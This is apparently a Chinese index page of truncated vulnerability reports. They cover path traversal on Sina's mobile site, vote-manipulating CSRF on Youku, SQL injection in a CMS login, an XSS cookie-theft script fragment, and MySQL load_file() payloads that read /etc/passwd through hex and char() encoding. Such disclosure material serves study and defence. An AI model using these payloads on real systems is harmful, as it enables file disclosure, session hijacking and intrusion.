-
新浪3G网站路径遍历
简要描述:对提交的变量没有作安全过滤和可读取文件目录作严格的控制,导致可以读取系统上任意文件,因为是php架构,可能同时导致其它严重问题。详细说明:漏洞证明:http://3g.sina.com.cn/prog/wapsite/books/...
-
优酷网CSRF致无限制顶或踩一个视频
简要描述:允许用户无限制的将一个视频置顶,或者置底详细说明:无限制顶或者踩一个视频漏洞证明:http://v.youku.com/v_show/id_XMzE1ODYzOTEy.html先查看当前的顶和踩的票数,再访问以下的链接,踩的票数会...
-
126cms后台登陆注入漏洞
看代码。。以下是引用片段:……若干……if( !$postdb["userid"] || !$postdb["pwd"] ){ echo &qu...
-
利用XSS转存Cookie
利用XSS转存cookie:插入XSS语句<script>document.write('<img src="" width=0 height=0 border=0 />');</scrip...
-
基于PHP+MySQL渗透测试中load_file()函数淫荡用法
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)2、replace(load_file(char(47,101,116,99,47,112...
